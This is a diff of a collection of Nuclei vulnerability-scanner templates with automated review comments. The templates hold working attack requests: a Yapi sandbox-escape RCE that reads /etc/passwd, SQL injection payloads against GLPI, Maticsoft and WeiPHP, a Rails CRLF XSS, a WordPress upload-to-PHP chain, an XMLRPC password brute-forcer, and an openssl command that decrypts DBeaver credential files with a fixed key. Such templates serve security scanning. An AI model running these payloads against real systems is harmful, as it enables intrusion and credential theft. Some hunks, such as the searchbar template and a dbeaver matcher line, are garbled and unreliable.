@@ -39,22 +39,21 @@ requests: --6985fa39c0698d07f6d418b37388e1b2-- + - | POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1 Host: {{Hostname}} - User-Agent: python-requests/2.25.1 - Accept: */* - Connection: close X-Requested-With: XMLHttpRequest - Content-Length: 81 + Accept: */* Content-Type: application/x-www-form-urlencoded eeSFL_ID=1&eeFileOld=nuclei.png&eeListFolder=%2F&eeFileAction=Rename%7Cnuclei.php + - | GET /wp-content/uploads/simple-file-list/nuclei.php HTTP/1.1 Host: {{Hostname}} Accept: */* - Connection: close + matchers-condition: and matchers: - type: word 
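Review bot: The added `intrusive,upload` tags are appropriate, but the template still does not document what a run leaves on the target. The request sequence visible in these hunks renames the uploaded `nuclei.png` to `nuclei.php` and fetches it, and no further request follows before `matchers-condition`. I would add a sentence to `description`, such as `A successful run leaves /wp-content/uploads/simple-file-list/nuclei.php on the target; remove it after testing.` The `python` tag describes the language of the original exploit rather than anything about the target, so it is unlikely to help filtering. The upload body itself lies outside these hunks.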
diff --git a/poc/remote_code_execution/wp-xmlrpc-brute-force-11623.yaml b/poc/remote_code_execution/wp-xmlrpc-brute-force-11623.yaml index cb27f780b4..26b60896bf 100644 --- a/poc/remote_code_execution/wp-xmlrpc-brute-force-11623.yaml +++ b/poc/remote_code_execution/wp-xmlrpc-brute-force-11623.yaml @@ -1,5 +1,4 @@ id: wordpress-xmlrpc-brute-force - info: name: Wordpress XMLRPC.php username and password Bruteforcer author: Exid @@ -9,7 +8,6 @@ info: - https://bugdasht.ir/reports/3c6841c0-ae4c-11eb-a510-517171a9198c - https://www.acunetix.com/vulnerabilities/web/wordpress-xml-rpc-authentication-brute-force/ tags: wordpress,php,xmlrpc,fuzz - requests: - raw: - | @@ -29,18 +27,15 @@ requests: - attack: clusterbomb payloads: username: helpers/wordlists/wp-users.txt password: helpers/wordlists/wp-passwords.txt - matchers-condition: and matchers: - type: status status: - 200 - - type: word part: body words: diff --git a/poc/remote_code_execution/yapi-rce-11726.yaml b/poc/remote_code_execution/yapi-rce-11726.yaml index 0078f2b883..0afebedde5 100644 --- a/poc/remote_code_execution/yapi-rce-11726.yaml +++ b/poc/remote_code_execution/yapi-rce-11726.yaml @@ -1,17 +1,19 @@ id: yapi-rce - info: - name: Yapi Remote Code Execution + name: Yapi - Remote Code Execution author: pikpikcu severity: critical - description: A vulnerability in Yapi allows remote unauthenticated attackers to cause the product to execute arbitrary code. + description: Yapi allows remote unauthenticated attackers to cause the product to execute arbitrary code. reference: - https://www.secpulse.com/archives/162502.html - https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b - https://twitter.com/sec715/status/1415484190561161216 - https://github.com/YMFE/yapi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 tags: yapi,rce - requests: - raw: - | # REQUEST 1 
@@ -19,42 +21,35 @@ requests: Host: {{Hostname}} Content-Type: application/json;charset=UTF-8 - {"email":"{{randstr}}@example.com","password":"{{randstr}}","username":"{{randstr}}"} - + {"email":"{{randstr}}@interact.sh","password":"{{randstr}}","username":"{{randstr}}"} - | # REQUEST 2 GET /api/group/list HTTP/1.1 Host: {{Hostname}} Content-Type: application/json, text/plain, */* - - | # REQUEST 3 POST /api/project/add HTTP/1.1 Host: {{Hostname}} Content-Type: application/json;charset=UTF-8 {"name":"{{randstr}}","basepath":"","group_id":"{{group_id}}","icon":"code-o","color":"cyan","project_type":"private"} - - | # REQUEST 4 GET /api/project/get?id={{project_id}} HTTP/1.1 Host: {{Hostname}} - - | # REQUEST 5 POST /api/interface/add HTTP/1.1 Host: {{Hostname}} Content-Type: application/json;charset=UTF-8 {"method":"GET","catid":"{{project_id}}","title":"{{randstr_1}}","path":"/{{randstr_1}}","project_id":{{project_id}}} - - | # REQUEST 6 POST /api/plugin/advmock/save HTTP/1.1 Host: {{Hostname}} Content-Type: application/json;charset=UTF-8 {"project_id":"{{project_id}}","interface_id":"{{interface_id}}","mock_script":"const sandbox = this\r\nconst ObjectConstructor = this.constructor\r\nconst FunctionConstructor = ObjectConstructor.constructor\r\nconst myfun = FunctionConstructor('return process')\r\nconst process = myfun()\r\nmockJson = process.mainModule.require(\"child_process\").execSync(\"cat /etc/passwd\").toString()","enable":true} - - | # REQUEST 7 GET /mock/{{project_id}}/{{randstr_1}} HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true extractors: - type: regex @@ -64,7 +59,6 @@ requests: part: body regex: - '"_id":([0-9]+),"group_name"' - - type: regex name: interface_id group: 1 @@ -72,7 +66,6 @@ requests: part: body regex: - '"req_body_form":\[\],"_id":([0-9]+)' - - type: regex name: project_id group: 1 
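Review bot: REQUEST 1 now registers with `"email":"{{randstr}}@interact.sh"` where it previously used `@example.com`. `example.com` is reserved for documentation, whereas `interact.sh` is a real, third-party-operated domain, so if the target sends any confirmation or notification mail for the new account it discloses the scanned host to that third party. I would keep `{"email":"{{randstr}}@example.com",...}`. The sequence also registers an account and creates a project and mock interface on the target, yet `tags: yapi,rce` in the first hunk carries no `intrusive` marker.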
@@ -80,14 +73,14 @@ requests: part: body regex: - '"tag":\[\],"_id":([0-9]+)' - matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" part: body - - type: status status: - 200 + +# Enhanced by mp on 2022/06/03 diff --git a/poc/ruby/grails-database-admin-console-7822.yaml b/poc/ruby/grails-database-admin-console-7822.yaml index d2aaaaddb9..f2ed34b32f 100644 --- a/poc/ruby/grails-database-admin-console-7822.yaml +++ b/poc/ruby/grails-database-admin-console-7822.yaml @@ -13,13 +13,7 @@ requests: - '{{BaseURL}}/dbconsole/' - '{{BaseURL}}/h2-console/' - matchers-condition: and matchers: - type: word words: - "H2 Console" - - - type: word - words: - - "Sorry, remote connections ('webAllowOthers') are disabled on this server" - negative: true diff --git a/poc/ruby/rails6-xss-9800.yaml b/poc/ruby/rails6-xss-9800.yaml index 184c779cfa..7991dd37b2 100644 --- a/poc/ruby/rails6-xss-9800.yaml +++ b/poc/ruby/rails6-xss-9800.yaml 
@@ -1,20 +1,22 @@ id: rails6-xss -# XSS (6.0.0 < rails < 6.0.3.2); Payload is location=%0djavascript:alert(1); -# Nuclei has issues with 302 response missing a Location header thus the -# extended payload to make Nuclei work. -# Working poc by @Mad-robot -# /rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0Djavascript%3Aalert%28document.domain%29 info: name: Rails CRLF XSS (6.0.0 < rails < 6.0.3.2) author: ooooooo_q,rootxharsh,iamnoooob severity: medium - reference: - - https://hackerone.com/reports/904059 + reference: https://hackerone.com/reports/904059 tags: rails,xss,crlf + + # XSS (6.0.0 < rails < 6.0.3.2); Payload is location=%0djavascript:alert(1); + # Nuclei has issues with 302 response missing a Location header thus the + # extended payload to make Nuclei work. + # Working poc by @Mad-robot + # /rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0Djavascript%3Aalert%28document.domain%29 + requests: - method: POST path: - "{{BaseURL}}/rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0djavascript:alert(1)//%0aaaaaa" + matchers-condition: and matchers: - type: word diff --git a/poc/samba/samba-config-9987.yaml b/poc/samba/samba-config-9987.yaml index b62e399c6a..15e05034c0 100644 --- a/poc/samba/samba-config-9987.yaml +++ b/poc/samba/samba-config-9987.yaml @@ -1,13 +1,16 @@ id: samba-config + info: name: Samba config file disclosure author: sheikhrishad severity: info tags: config,exposure,smb,samba + requests: - method: GET path: - "{{BaseURL}}/smb.conf" + matchers-condition: and matchers: - type: word @@ -15,6 +18,7 @@ requests: - "configuration file" - "samba" condition: and + - type: status status: - 200 diff --git a/poc/samba/samba-detect-9988.yaml b/poc/samba/samba-detect-9988.yaml index 1bd21fd9d7..433010b743 100644 --- a/poc/samba/samba-detect-9988.yaml +++ b/poc/samba/samba-detect-9988.yaml 
@@ -1,15 +1,8 @@ id: samba-detection info: - name: Samba Detection + name: samba detection author: pussycat0x severity: info - description: Samba is a free and open-source software that allows files to be shared across Windows and Linux systems simply and easily. - reference: - - https://www.samba.org/samba/what_is_samba.html - - https://www.samba.org/samba/history/security.html - classification: - cwe-id: CWE-200 - remediation: Always apply the latest security patch. tags: network,smb,samba network: - inputs: @@ -22,4 +15,3 @@ network: - type: word words: - "SMBr" -# Enhanced by mp on 2022/02/09 diff --git a/poc/sap/sap-hana-xsengine-panel-10037.yaml b/poc/sap/sap-hana-xsengine-panel-10037.yaml index 11aec1ad6b..fbd5d438be 100644 --- a/poc/sap/sap-hana-xsengine-panel-10037.yaml +++ b/poc/sap/sap-hana-xsengine-panel-10037.yaml @@ -1,9 +1,11 @@ id: sap-hana-xsengine-panel + info: name: SAP HANA XSEngine Admin Panel author: PR3R00T severity: info tags: panel,sap + requests: - method: GET path: diff --git a/poc/sap/sap-netweaver-detect-10044.yaml b/poc/sap/sap-netweaver-detect-10044.yaml index edbd2eaef5..9fe826a6f5 100644 --- a/poc/sap/sap-netweaver-detect-10044.yaml +++ b/poc/sap/sap-netweaver-detect-10044.yaml @@ -1,14 +1,17 @@ id: sap-netweaver-detect + info: name: SAP NetWeaver ICM Detection author: randomstr1ng - severity: info description: Detection of SAP NetWeaver ABAP Webserver (ICM/ICF) + severity: info tags: sap,webserver + requests: - method: GET path: - "{{BaseURL}}" + redirects: true max-redirects: 2 matchers: @@ -19,6 +22,7 @@ requests: - "Sap-Server:" - "SAP NetWeaver Application Server" condition: or + extractors: - type: kval part: header diff --git a/poc/sap/sap-redirect-10066.yaml b/poc/sap/sap-redirect-10066.yaml index 906e0b928c..6b87d06067 100644 --- a/poc/sap/sap-redirect-10066.yaml +++ b/poc/sap/sap-redirect-10066.yaml 
@@ -1,25 +1,19 @@ id: sap-redirect - info: name: SAP wide open redirect author: Gal Nagli severity: medium description: A vulnerability in SAP's 'logoff' endpoint allows attackers to redirect victims to their URL of choice. tags: redirect,sap - requests: - method: GET - path: - "{{BaseURL}}/sap/public/bc/icf/logoff?redirecturl=https://example.com" - matchers-condition: and matchers: - - type: status status: - 302 - - type: word words: - "Location: https://www.example.com" diff --git a/poc/search/elasticsearch-sql-client-detect.yaml b/poc/search/elasticsearch-sql-client-detect.yaml index e075189456..b6efdc2579 100644 --- a/poc/search/elasticsearch-sql-client-detect.yaml +++ b/poc/search/elasticsearch-sql-client-detect.yaml @@ -1,23 +1,24 @@ -id: elasticsearch-sql-client-detect -info: - name: Elasticsearch SQL Client Detect - author: pussycat0x - severity: low - reference: https://www.shodan.io/search?query=http.title%3A%22Elasticsearch-sql+client%22 - tags: elasticsearch,tech,sql +id: elasticsearch-sql-client-detect -requests: - - method: GET - path: - - '{{BaseURL}}' +info: + name: Elasticsearch SQL Client Detect + author: pussycat0x + severity: low + reference: https://www.shodan.io/search?query=http.title%3A%22Elasticsearch-sql+client%22 + tags: elasticsearch,tech,sql - matchers-condition: and - matchers: - - type: word - words: - - 'Elasticsearch-sql client' - part: body - - - type: status - status: - - 200 +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'Elasticsearch-sql client' + part: body + + - type: status + status: + - 200 diff --git a/poc/search/searchbar.yaml b/poc/search/searchbar.yaml index 3a8c512bf2..8cec0f7063 100644 --- a/poc/search/searchbar.yaml +++ b/poc/search/searchbar.yaml 
@@ -2,7 +2,7 @@ id: search-field info: name: Search Field Detection Template - author: nithissh + author: foulenzer severity: info description: Searches Response body for input-tag and id= or name= tags: search,input @@ -39,4 +39,4 @@ requests: - type: word words: - - 'nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{num}}),5,6,7,8,9%23' + matchers: - type: word part: body diff --git a/poc/sql/Arcms-json_newslist-sqli.yaml b/poc/sql/Arcms-json_newslist-sqli.yaml old mode 100755 new mode 100644 diff --git a/poc/sql/BlueCMS_v1-adjs-sqli.yaml b/poc/sql/BlueCMS_v1-adjs-sqli.yaml old mode 100755 new mode 100644 diff --git a/poc/sql/GLPI-9.3.3-SQL-Injection.yaml b/poc/sql/GLPI-9.3.3-SQL-Injection.yaml index e7c97f72d9..98a2a439f1 100644 --- a/poc/sql/GLPI-9.3.3-SQL-Injection.yaml +++ b/poc/sql/GLPI-9.3.3-SQL-Injection.yaml 
@@ -1,30 +1,25 @@ ---- -id: GLPI_SQL_Injection - -info: - author: RedTeamBrasil - description: "Synacktiv discovered that GLPI exposes a script (/scripts/unlock_tasks.php) that not correctly sanitize usercontrolled data before using it in SQL queries. Thus, an attacker could abuse the affected feature to alter the semantic original SQL query and retrieve database records. This script is reachable without authentication." - name: "Pre-authenticated SQL injection in GLPI <= 9.3.3" - reference: "https://www.synacktiv.com/ressources/advisories/GLPI_9.3.3_SQL_Injection.pdf" - severity: high - tags: "glpi,cve,sqli" - -requests: - - - matchers: - - - part: body - type: word - words: - - "-MariaDB-" - max-redirects: 3 - method: GET - path: - - "{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1" - - "{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1" - redirects: true - extractors: - - type: regex - part: body - regex: - - "[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB" \ No newline at end of file +id: GLPI_SQL_Injection +info: + author: RedTeamBrasil + description: "Synacktiv discovered that GLPI exposes a script (/scripts/unlock_tasks.php) that not correctly sanitize usercontrolled data before using it in SQL queries. Thus, an attacker could abuse the affected feature to alter the semantic original SQL query and retrieve database records. This script is reachable without authentication." 
+ name: "Pre-authenticated SQL injection in GLPI <= 9.3.3" + reference: "https://www.synacktiv.com/ressources/advisories/GLPI_9.3.3_SQL_Injection.pdf" + severity: high + tags: "glpi,cve,sqli" +requests: + - matchers: + - part: body + type: word + words: + - "-MariaDB-" + max-redirects: 3 + method: GET + path: + - "{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1" + - "{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1" + redirects: true + extractors: + - type: regex + part: body + regex: + - "[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB" diff --git a/poc/sql/Maticsoft-Shop-sqli.yaml b/poc/sql/Maticsoft-Shop-sqli.yaml index 4a87f191a9..06e83a6789 100644 --- a/poc/sql/Maticsoft-Shop-sqli.yaml +++ b/poc/sql/Maticsoft-Shop-sqli.yaml @@ -1,16 +1,13 @@ id: Maticsoft-Shop-sqli - info: name: Maticsoft-Shop商城CategoryId参数SQL注入 author: Str1am severity: high tags: Maticsoft,sqli - requests: - method: GET path: - "{{BaseURL}}/NodeProdCategory.aspx?action=GetChildNode&CategoryId=2%20AND%201=@@version" - matchers-condition: and matchers: - type: word diff --git a/poc/sql/api-abuseipdb.yaml b/poc/sql/api-abuseipdb.yaml index 077084fa93..ca83d86700 100644 --- a/poc/sql/api-abuseipdb.yaml +++ b/poc/sql/api-abuseipdb.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://docs.abuseipdb.com/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/AbuseIPDB.md + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/AbuseIPDB.md tags: token-spray,abuseipdb self-contained: true diff --git a/poc/sql/couchdb-exposure-1239.yaml b/poc/sql/couchdb-exposure-1239.yaml index 83e4c2e185..376f2370b6 100644 --- a/poc/sql/couchdb-exposure-1239.yaml +++ b/poc/sql/couchdb-exposure-1239.yaml 
@@ -3,13 +3,14 @@ info: name: couchdb exposure author: organiccrap severity: low - tags: panel,couchdb + tags: panel requests: - method: GET path: - '{{BaseURL}}/_all_dbs' - + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 matchers-condition: and matchers: - type: word diff --git a/poc/sql/database-error-6771.yaml b/poc/sql/database-error-6771.yaml index ebdcaa6c55..7dce3ae9f0 100644 --- a/poc/sql/database-error-6771.yaml +++ b/poc/sql/database-error-6771.yaml @@ -3,8 +3,7 @@ info: name: Database Error author: dhiyaneshDK severity: info - metadata: - shodan-query: http.title:"Database Error" + reference: https://www.shodan.io/search?query=http.title%3A%22Database+Error%22 tags: misconfig,database requests: - method: GET diff --git a/poc/sql/db-schema.yaml b/poc/sql/db-schema.yaml index 9683a57871..116072e8c2 100644 --- a/poc/sql/db-schema.yaml +++ b/poc/sql/db-schema.yaml @@ -2,10 +2,9 @@ id: db-schema info: name: Discover db schema files + description: This file is auto-generated from the current state of the database. author: geeknik severity: info - description: This file is auto-generated from the current state of the database. - tags: exposure,backup requests: - method: GET @@ -16,20 +15,22 @@ requests: matchers-condition: and matchers: - - type: word words: - "This file is auto-generated from the current state of the database." - "ActiveRecord::Schema.define" condition: and - + - type: word + part: header + words: + - "text/html" + negative: true - type: status status: - 200 - extractors: - type: regex name: version part: body regex: - - 'eRecord::Schema\.define\(version: ([0-9_]+)\) do' + - 'version: \d{14}' diff --git a/poc/sql/dbeaver-credentials.yaml b/poc/sql/dbeaver-credentials.yaml index 28f5ad1e84..e9e66f7357 100644 --- a/poc/sql/dbeaver-credentials.yaml +++ b/poc/sql/dbeaver-credentials.yaml 
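Review bot: In the db-schema hunk the new extractor `'version: \d{14}'` matches only a version written as 14 consecutive digits, whereas the pattern it replaces used `([0-9_]+)` and so accepted underscores. Newer Rails releases write the schema version with underscore separators (constructed example: `2024_01_31_120000`), so for those files the matchers would still fire but the extractor would return nothing. I would use `- 'version: [0-9_]{14,}'`. The hunk also removes `tags: exposure,backup`, which takes the template out of tag-scoped exposure scans.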
@@ -1,28 +1,26 @@ id: dbeaver-credentials + info: name: DBeaver Credential Exposure author: geeknik - severity: high - tags: exposure,dbeaver + severity: info + requests: - method: GET path: - "{{BaseURL}}/.dbeaver/credentials-config.json" - # To decode the credentials file, use following command: + # to decode the above file, run this: # openssl aes-128-cbc -d -K "babb4a9f774ab853c96c2d653dfe544a" -iv 00000000000000000000000000000000 -in credentials-config.json | dd bs=1 skip=16 2>/dev/null + matchers-condition: and matchers: - type: status status: - 200 - type: word - part: header words: - "application/octet-stream" + part: header - type: dsl dsl: - - 'len(body) > 2' - - type: dsl - dsl: - - "!contains(tolower(body), '=200 && len(body) <400" diff --git a/poc/sql/elasticsearch-sql-client-detect.yaml b/poc/sql/elasticsearch-sql-client-detect.yaml index e075189456..b6efdc2579 100644 --- a/poc/sql/elasticsearch-sql-client-detect.yaml +++ b/poc/sql/elasticsearch-sql-client-detect.yaml @@ -1,23 +1,24 @@ -id: elasticsearch-sql-client-detect -info: - name: Elasticsearch SQL Client Detect - author: pussycat0x - severity: low - reference: https://www.shodan.io/search?query=http.title%3A%22Elasticsearch-sql+client%22 - tags: elasticsearch,tech,sql +id: elasticsearch-sql-client-detect -requests: - - method: GET - path: - - '{{BaseURL}}' +info: + name: Elasticsearch SQL Client Detect + author: pussycat0x + severity: low + reference: https://www.shodan.io/search?query=http.title%3A%22Elasticsearch-sql+client%22 + tags: elasticsearch,tech,sql - matchers-condition: and - matchers: - - type: word - words: - - 'Elasticsearch-sql client' - part: body - - - type: status - status: - - 200 +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'Elasticsearch-sql client' + part: body + + - type: status + status: + - 200 
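Review bot: `severity` is lowered from `high` to `info` for `/.dbeaver/credentials-config.json`, yet the comment kept in this hunk documents decoding the file with a fixed, published key, so an exposed copy is equivalent to plaintext database credentials. At `info` the finding is dropped by any severity-filtered scan or triage queue. I would keep `severity: high` and restore `tags: exposure,dbeaver`. The last `dsl` line of the hunk is garbled on this page, so the new body-length check could not be reviewed.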
diff --git a/poc/sql/exposed-adb-7280.yaml b/poc/sql/exposed-adb-7280.yaml index e0a43b6ba2..26f932d53d 100644 --- a/poc/sql/exposed-adb-7280.yaml +++ b/poc/sql/exposed-adb-7280.yaml @@ -1,22 +1,33 @@ id: expsoed-adb + info: name: Exposed Android Debug Bridge author: pdteam,pikpikcu severity: critical + description: An exposed Android debug bridge was discovered. + reference: + - https://doublepulsar.com/root-bridge-how-thousands-of-internet-connected-android-devices-now-have-no-security-and-are-b46a68cb0f20 + - https://www.hackeracademy.org/how-to-hack-android-device-with-adb-android-debugging-bridge + - https://www.securezoo.com/2018/06/thousands-of-android-devices-leave-debug-port-5555-exposed/ tags: network,adb,rce,android - reference: https://www.hackeracademy.org/how-to-hack-android-device-with-adb-android-debugging-bridge + network: - inputs: - - data: "434e584e0100000100001000ea000000445b0000bcb1a7b1" # Generated using https://github.com/projectdiscovery/network-fingerprint + - data: "434e584e0100000100001000ea000000445b0000bcb1a7b1" # Generated using https://github.com/projectdiscovery/network-fingerprint type: hex + - data: "686f73743a3a66656174757265733d7368656c6c5f76322c636d642c737461745f76322c6c735f76322c66697865645f707573685f6d6b6469722c617065782c6162622c66697865645f707573685f73796d6c696e6b5f74696d657374616d702c6162625f657865632c72656d6f756e745f7368656c6c2c747261636b5f6170702c73656e64726563765f76322c73656e64726563765f76325f62726f746c692c73656e64726563765f76325f6c7a342c73656e64726563765f76325f7a7374642c73656e64726563765f76325f6472795f72756e5f73656e642c6f70656e73637265656e5f6d646e73" type: hex + host: - "{{Hostname}}" - "{{Host}}:5555" + matchers: - type: word words: - "device" - "product" condition: and + +# Enhanced by mp on 2022/03/21 diff --git a/poc/sql/exposed-sqlite-manager-7350.yaml b/poc/sql/exposed-sqlite-manager-7350.yaml index a76ba9d93d..cff80e3ad5 100644 --- a/poc/sql/exposed-sqlite-manager-7350.yaml 
+++ b/poc/sql/exposed-sqlite-manager-7350.yaml @@ -1,18 +1,15 @@ id: exposed-sqlite-manager - info: name: SQLiteManager author: dhiyaneshDK severity: medium reference: https://www.exploit-db.com/ghdb/5003 tags: sqlite - requests: - method: GET path: - '{{BaseURL}}/sqlite/' - '{{BaseURL}}/sqlitemanager/' - matchers-condition: and matchers: - type: word diff --git a/poc/sql/grails-database-admin-console-7822.yaml b/poc/sql/grails-database-admin-console-7822.yaml index d2aaaaddb9..f2ed34b32f 100644 --- a/poc/sql/grails-database-admin-console-7822.yaml +++ b/poc/sql/grails-database-admin-console-7822.yaml @@ -13,13 +13,7 @@ requests: - '{{BaseURL}}/dbconsole/' - '{{BaseURL}}/h2-console/' - matchers-condition: and matchers: - type: word words: - "H2 Console" - - - type: word - words: - - "Sorry, remote connections ('webAllowOthers') are disabled on this server" - negative: true diff --git a/poc/sql/mongodb-ops-manager-8922.yaml b/poc/sql/mongodb-ops-manager-8922.yaml index 83b2f801c5..17f1155c95 100644 --- a/poc/sql/mongodb-ops-manager-8922.yaml +++ b/poc/sql/mongodb-ops-manager-8922.yaml @@ -1,17 +1,15 @@ id: mongodb-ops-manager - info: name: MongoDB Ops Manager author: dhiyaneshDK severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22MongoDB+Ops+Manager%22 + reference: + - https://www.shodan.io/search?query=http.title%3A%22MongoDB+Ops+Manager%22 tags: panel,mongodb - requests: - method: GET path: - '{{BaseURL}}/account/login' - matchers-condition: and matchers: - type: word diff --git a/poc/sql/mongodb-unauth-8926.yaml b/poc/sql/mongodb-unauth-8926.yaml index 385b2f7ca3..469fd95eb9 100644 --- a/poc/sql/mongodb-unauth-8926.yaml +++ b/poc/sql/mongodb-unauth-8926.yaml 
@@ -3,11 +3,7 @@ info: name: Unauth MongoDB Disclosure author: pdteam severity: high - reference: - - https://github.com/orleven/Tentacle - - https://book.hacktricks.xyz/pentesting/27017-27018-mongodb - - https://www.mongodb.com/features/mongodb-authentication - remediation: Enable Authentication in MongoDB + reference: https://github.com/orleven/Tentacle tags: network,mongodb,unauth network: - inputs: diff --git a/poc/sql/odoo-database-manager.yaml b/poc/sql/odoo-database-manager.yaml index 65c23b363a..3031253bbe 100644 --- a/poc/sql/odoo-database-manager.yaml +++ b/poc/sql/odoo-database-manager.yaml @@ -1,14 +1,16 @@ id: odoo-database-manager + info: - name: Odoo - Database Manager Discovery + name: Odoo-Database-Manager author: __Fazal,R3dg33k severity: high - description: Odoo database manager was discovered. tags: panel,odoo + requests: - method: GET path: - '{{BaseURL}}/web/database/manager' + matchers-condition: and matchers: - type: status @@ -19,5 +21,3 @@ requests: - "Odoo" - "{ action: 'database_manager' }" condition: and - -# Enhanced by mp on 2022/07/15 diff --git a/poc/sql/oracle-dbcs-9355.yaml b/poc/sql/oracle-dbcs-9355.yaml index 4dd45891c6..29a3ed7ae9 100644 --- a/poc/sql/oracle-dbcs-9355.yaml +++ b/poc/sql/oracle-dbcs-9355.yaml 
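Review bot: The info block of mongodb-unauth-8926.yaml loses its `remediation: Enable Authentication in MongoDB` line and two of its three references, which leaves a high-severity finding with no fix guidance in the report output. Keep the remediation field and the `https://www.mongodb.com/features/mongodb-authentication` reference so that whoever receives the finding knows what to change. The `network:` section continues outside the hunk.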
@@ -1,23 +1,20 @@ -id: oracle-dbcs -info: - name: Oracle Database as a Service - author: pussycat0x - severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+Database+as+a+Service%22 - tags: oracle,tech - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers-condition: and - matchers: - - type: word - words: - - 'Oracle Database as a Service' - part: body - - - type: status - status: - - 200 +id: oracle-dbcs +info: + name: Oracle Database as a Service + author: pussycat0x + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+Database+as+a+Service%22 + tags: oracle,tech +requests: + - method: GET + path: + - '{{BaseURL}}' + matchers-condition: and + matchers: + - type: word + words: + - 'Oracle Database as a Service' + part: body + - type: status + status: + - 200 diff --git a/poc/sql/sql-dump-10497.yaml b/poc/sql/sql-dump-10497.yaml index 05e97713ac..0bf0d2bcb0 100644 --- a/poc/sql/sql-dump-10497.yaml +++ b/poc/sql/sql-dump-10497.yaml @@ -1,9 +1,11 @@ id: default-sql-dump + info: name: MySQL Dump Files - author: geeknik & @dwisiswant0 + author: geeknik,dwisiswant0 severity: medium - tags: exposure,backup + tags: exposure,backup,mysql + requests: - method: GET path: @@ -28,6 +30,7 @@ requests: - "{{BaseURL}}/wp-content/uploads/dump.sql" headers: Range: "bytes=0-3000" + max-size: 2000 # Size in bytes - Max Size to read from server response matchers-condition: and matchers: @@ -35,6 +38,7 @@ requests: regex: - "(?m)(?:DROP|CREATE|(?:UN)?LOCK) TABLE|INSERT INTO" part: body + - type: status status: - 200 diff --git a/poc/sql/sqliheader.yaml b/poc/sql/sqliheader.yaml index 832a9fc156..012bac2af3 100644 --- a/poc/sql/sqliheader.yaml +++ b/poc/sql/sqliheader.yaml @@ -1,8 +1,10 @@ id: header-sqli + info: name: Request header based sqli - author: panch0r3d + author: nithissh severity: high + requests: - method: GET path: 
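Review bot: The added `max-size: 2000` in the second hunk of sql-dump-10497.yaml is lower than the `Range: "bytes=0-3000"` header just above it, so roughly a third of the requested bytes are fetched and then never seen by the regex matcher. Make the two limits agree, either `Range: "bytes=0-2000"` or `max-size: 3000`. With the smaller window a dump whose first `CREATE TABLE` or `INSERT INTO` follows a long comment header would be missed. The same mismatch is in the poc/sql_injection/sql-dump-10497.yaml copy of this hunk.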
diff --git a/poc/sql/thumbs-db-disclosure-10763.yaml b/poc/sql/thumbs-db-disclosure-10763.yaml index b5ee7b65d9..728de9d555 100644 --- a/poc/sql/thumbs-db-disclosure-10763.yaml +++ b/poc/sql/thumbs-db-disclosure-10763.yaml @@ -1,12 +1,11 @@ id: thumbs-db-disclosure - info: name: Thumbs DB Disclosure author: dhiyaneshDk severity: info - reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/thumbs-db-disclosure.json + reference: + - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/thumbs-db-disclosure.json tags: exposure,files - requests: - method: GET path: @@ -17,7 +16,6 @@ requests: binary: - 'D0CF11E0A1B11AE1' part: body - - type: status status: - 200 diff --git a/poc/sql/weiphp-sql-injection.yaml b/poc/sql/weiphp-sql-injection.yaml index 8b0c9a5a1a..2b57dda7f7 100644 --- a/poc/sql/weiphp-sql-injection.yaml +++ b/poc/sql/weiphp-sql-injection.yaml @@ -1,24 +1,28 @@ id: weiphp-sql-injection + info: name: WeiPHP 5.0 SQLI author: pikpikcu severity: high - reference: - - https://github.com/Y4er/Y4er.com/blob/15f49973707f9d526a059470a074cb6e38a0e1ba/content/post/weiphp-exp-sql.md - metadata: - verified: true - shodan-query: http.html:"WeiPHP5.0" + reference: https://github.com/Y4er/Y4er.com/blob/15f49973707f9d526a059470a074cb6e38a0e1ba/content/post/weiphp-exp-sql.md tags: weiphp,sql + requests: - method: POST path: - "{{BaseURL}}/public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--+ " + headers: + Content-Type: application/x-www-form-urlencoded + matchers-condition: and matchers: + - type: word - part: body words: - "52c69e3a57331081823331c4e69d3f2" + part: body + condition: and + - type: status status: - 500 diff --git a/poc/sql/wordpress-db-repair-11254.yaml b/poc/sql/wordpress-db-repair-11254.yaml index 3b9b5fb05f..7c9d635e19 100644 --- a/poc/sql/wordpress-db-repair-11254.yaml +++ b/poc/sql/wordpress-db-repair-11254.yaml 
